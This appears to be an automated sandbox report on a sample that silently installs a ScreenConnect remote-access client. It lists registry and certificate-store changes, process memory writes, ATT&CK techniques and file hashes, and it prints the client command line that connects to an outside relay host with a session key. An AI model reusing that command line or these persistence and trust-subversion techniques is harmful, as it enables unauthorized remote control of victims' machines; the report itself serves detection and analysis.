Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0003_210f2122fbcba835\appid = 68747470733a2f2f726f62696e736f6e2e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e342e393032362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e332e342e393032362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0003_none_5818e4ff39ec832e	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0003_none_04f4a566935dd369\lock!180000008995570e040d0000b00700000000000000000000 = 30303030306430342c30316462316364343532353765323837	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0003_none_9837ab9241d36e8a	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0003_none_5818e4ff39ec832e\implication!scre..tion_25b0fbb6ef7eb094_0018.0003_22d = 68747470733a2f2f726f62696e736f6e2e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e342e393032362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0003_none_5818e4ff39ec832e\Files\ScreenConnect.Windows.dll_fc0d83aff7df0b5b = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_210f2122fbcba835\scre..ient_4b14c015c87c1ad8_0018.0003_none_b4e7e641e6	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0003_none_53a10d1dfd9e6ffe	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_22dec766967f8525\scre...exe_25b0fbb6ef7eb094_0018.0003_none_9837ab9241 = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0003_none_04f4a566935dd369\Files\ScreenConnect.ClientService.dll_e781b1c636 = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_210f2122fbcba835\scre..core_4b14c015c87c1ad8_0018.0003_none_53a10d1dfd = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Installations	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gi_scre..tion_25b0fbb6ef7eb094_9edfe039055229dd\LastRunVersion = 68747470733a2f2f726f62696e736f6e2e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e342e393032362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e332e342e393032362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0003_none_9837ab9241d36e8a\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e332e342e393032362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 30000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0003_none_9837ab9241d36e8a\SizeOfStronglyNamedComponent = d84f040000000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_22dec766967f8525	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_210f2122fbcba835\scre..ient_4b14c015c87c1ad8_0018.0003_none_e9b66af00c = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment	dfsvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\ComponentStore_RandomString = "ET9PVTGBCDK07ZLOA9C9HN0O"	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 68747470733a2f2f726f62696e736f6e2e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e342e393032362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e332e342e393032362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0003_none_e9b66af00cedc602\identity = 53637265656e436f6e6e6563742e436c69656e742c2056657273696f6e3d32342e332e342e393032362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0003_none_e9b66af00cedc602	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_210f2122fbcba835	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_b4e7e641e682530b\Transform = 01	dfsvc.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	db20b0c8f4b8faa38b7239b86764f499a966644584ffcce7ded537d298dfb32fN.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	db20b0c8f4b8faa38b7239b86764f499a966644584ffcce7ded537d298dfb32fN.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579	db20b0c8f4b8faa38b7239b86764f499a966644584ffcce7ded537d298dfb32fN.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	db20b0c8f4b8faa38b7239b86764f499a966644584ffcce7ded537d298dfb32fN.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	db20b0c8f4b8faa38b7239b86764f499a966644584ffcce7ded537d298dfb32fN.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1648	ScreenConnect.ClientService.exe
1648	ScreenConnect.ClientService.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1852	dfsvc.exe
Token: SeDebugPrivilege	1648	ScreenConnect.ClientService.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
3232	ScreenConnect.WindowsClient.exe
3232	ScreenConnect.WindowsClient.exe
3232	ScreenConnect.WindowsClient.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
3232	ScreenConnect.WindowsClient.exe
3232	ScreenConnect.WindowsClient.exe
3232	ScreenConnect.WindowsClient.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 1096 wrote to memory of 1852	1096	db20b0c8f4b8faa38b7239b86764f499a966644584ffcce7ded537d298dfb32fN.exe	86
PID 1096 wrote to memory of 1852	1096	db20b0c8f4b8faa38b7239b86764f499a966644584ffcce7ded537d298dfb32fN.exe	86
PID 1852 wrote to memory of 3332	1852	dfsvc.exe	87
PID 1852 wrote to memory of 3332	1852	dfsvc.exe	87
PID 1852 wrote to memory of 3332	1852	dfsvc.exe	87
PID 3332 wrote to memory of 4440	3332	ScreenConnect.WindowsClient.exe	88
PID 3332 wrote to memory of 4440	3332	ScreenConnect.WindowsClient.exe	88
PID 3332 wrote to memory of 4440	3332	ScreenConnect.WindowsClient.exe	88
PID 1648 wrote to memory of 3232	1648	ScreenConnect.ClientService.exe	90
PID 1648 wrote to memory of 3232	1648	ScreenConnect.ClientService.exe	90
PID 1648 wrote to memory of 3232	1648	ScreenConnect.ClientService.exe	90

C:\Users\Admin\AppData\Local\Temp\db20b0c8f4b8faa38b7239b86764f499a966644584ffcce7ded537d298dfb32fN.exe
"C:\Users\Admin\AppData\Local\Temp\db20b0c8f4b8faa38b7239b86764f499a966644584ffcce7ded537d298dfb32fN.exe"
1⤵
- Manipulates Digital Signatures
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1096
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
  2⤵
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1852
- - C:\Users\Admin\AppData\Local\Apps\2.0\8GLB37EA.3LL\REQH57D4.HGX\scre..tion_25b0fbb6ef7eb094_0018.0003_210f2122fbcba835\ScreenConnect.WindowsClient.exe
    "C:\Users\Admin\AppData\Local\Apps\2.0\8GLB37EA.3LL\REQH57D4.HGX\scre..tion_25b0fbb6ef7eb094_0018.0003_210f2122fbcba835\ScreenConnect.WindowsClient.exe"
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:3332
  - - C:\Users\Admin\AppData\Local\Apps\2.0\8GLB37EA.3LL\REQH57D4.HGX\scre..tion_25b0fbb6ef7eb094_0018.0003_210f2122fbcba835\ScreenConnect.ClientService.exe
      "C:\Users\Admin\AppData\Local\Apps\2.0\8GLB37EA.3LL\REQH57D4.HGX\scre..tion_25b0fbb6ef7eb094_0018.0003_210f2122fbcba835\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=instance-ud5i67-relay.screenconnect.com&p=443&s=25022cd9-073e-40dc-bf74-0eb4d2f3b264&k=BgIAAACkAABSU0ExAAgAAAEAAQC9apT4qbTuF9C17zc6a3ECss826HabWIb7y364WqYlMvF2tFQnmSqWg0s5unBec%2b3z48FHY7e0p3TbrtuNC6J%2bwq8QtKtX%2fq3sM71BFB4v%2b8sEl3RRFIHNyKr5wssil0KrjpM6XygMhvUYk9abiL%2bb6v1xaqnrYUcSxm8IPp88peWwQHQx2i1SQUdJkddFznx%2bPmYbblzMPg1YoqcBl9ZLhZ7bo2CxUjZ3CBpItCN%2bps1PzKe6nV6i984DEzEFLWYZqzIZckzeIPRZk2FreX5JT%2fKYecbRFNKPejTDyeQhkMHOoHB4Sru4f5OaLaNh0XVIgtOkoo9r74dvO1ZTwJLg&r=&i=fumero" "1"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:4440
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1096 -s 308
  2⤵
  - Program crash
  PID:452

C:\Users\Admin\AppData\Local\Apps\2.0\8GLB37EA.3LL\REQH57D4.HGX\scre..tion_25b0fbb6ef7eb094_0018.0003_210f2122fbcba835\ScreenConnect.ClientService.exe
"C:\Users\Admin\AppData\Local\Apps\2.0\8GLB37EA.3LL\REQH57D4.HGX\scre..tion_25b0fbb6ef7eb094_0018.0003_210f2122fbcba835\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=instance-ud5i67-relay.screenconnect.com&p=443&s=25022cd9-073e-40dc-bf74-0eb4d2f3b264&k=BgIAAACkAABSU0ExAAgAAAEAAQC9apT4qbTuF9C17zc6a3ECss826HabWIb7y364WqYlMvF2tFQnmSqWg0s5unBec%2b3z48FHY7e0p3TbrtuNC6J%2bwq8QtKtX%2fq3sM71BFB4v%2b8sEl3RRFIHNyKr5wssil0KrjpM6XygMhvUYk9abiL%2bb6v1xaqnrYUcSxm8IPp88peWwQHQx2i1SQUdJkddFznx%2bPmYbblzMPg1YoqcBl9ZLhZ7bo2CxUjZ3CBpItCN%2bps1PzKe6nV6i984DEzEFLWYZqzIZckzeIPRZk2FreX5JT%2fKYecbRFNKPejTDyeQhkMHOoHB4Sru4f5OaLaNh0XVIgtOkoo9r74dvO1ZTwJLg&r=&i=fumero" "1"
1⤵
- Sets service image path in registry
- Drops file in System32 directory
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1648
- C:\Users\Admin\AppData\Local\Apps\2.0\8GLB37EA.3LL\REQH57D4.HGX\scre..tion_25b0fbb6ef7eb094_0018.0003_210f2122fbcba835\ScreenConnect.WindowsClient.exe
  "C:\Users\Admin\AppData\Local\Apps\2.0\8GLB37EA.3LL\REQH57D4.HGX\scre..tion_25b0fbb6ef7eb094_0018.0003_210f2122fbcba835\ScreenConnect.WindowsClient.exe" "RunRole" "67501777-9120-46b7-bf44-e0a0292c7229" "User"
  2⤵
  - Drops file in System32 directory
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1096 -ip 1096
1⤵
PID:2796

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Apps\2.0\8GLB37EA.3LL\REQH57D4.HGX\manifests\scre...exe_25b0fbb6ef7eb094_0018.0003_none_9837ab9241d36e8a.cdf-ms

Filesize
24KB

MD5
bd7d2fdc65d3a8e542c48f67e9492733

SHA1
754826ac0dc776831d28c1e9f00bbbedb0e7685c

SHA256
5ab2a8ee25a307e50f67dcaba3308c8d1df62f969d64332b53c3462e3d8c368c

SHA512
d7f79fe9c12a6b9a144b6304eb05312c9456e7091de602529b1d6d5bf14a0e38a914eb87581c3df85ceda698e82ad1ed9d284f47ce9fbc3b0b7a60afe81644f3

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\8GLB37EA.3LL\REQH57D4.HGX\manifests\scre..core_4b14c015c87c1ad8_0018.0003_none_53a10d1dfd9e6ffe.cdf-ms

Filesize
3KB

MD5
ff7f687660e1460ba5b3627d87ad5276

SHA1
ce2353269a4ad29093fadc97fc3dee2b013b04f4

SHA256
07148465be5fba52bb3c10658aa5d2bcc329fcc5a29ecbfa5fbdb8fa0ee82fca

SHA512
7d32cdaf8e631fb248cae756c35e570971565f8118fed47c66938efacf21dfb8a45dec038f268bff4454125fe325af19398c8d8f8888ac116502b95fcbb2a1bc

Download Submit
C:\Users\Admin\AppData\Local\Apps\2.0\8GLB37EA.3LL\REQH57D4.HGX\manifests\scre..dows_4b14c015c87c1ad8_0018.0003_none_5818e4ff39ec832e.cdf-ms

Filesize
5KB

MD5
8586f059bf68c2673c95a9c76184c712

SHA1
b252ee9a052637899eb9249f40089460c541a2e7

SHA256
2a74ba9da89ba285eb0620df197c4dcf50306ed795fe597101e0bd8abb12af81

SHA512
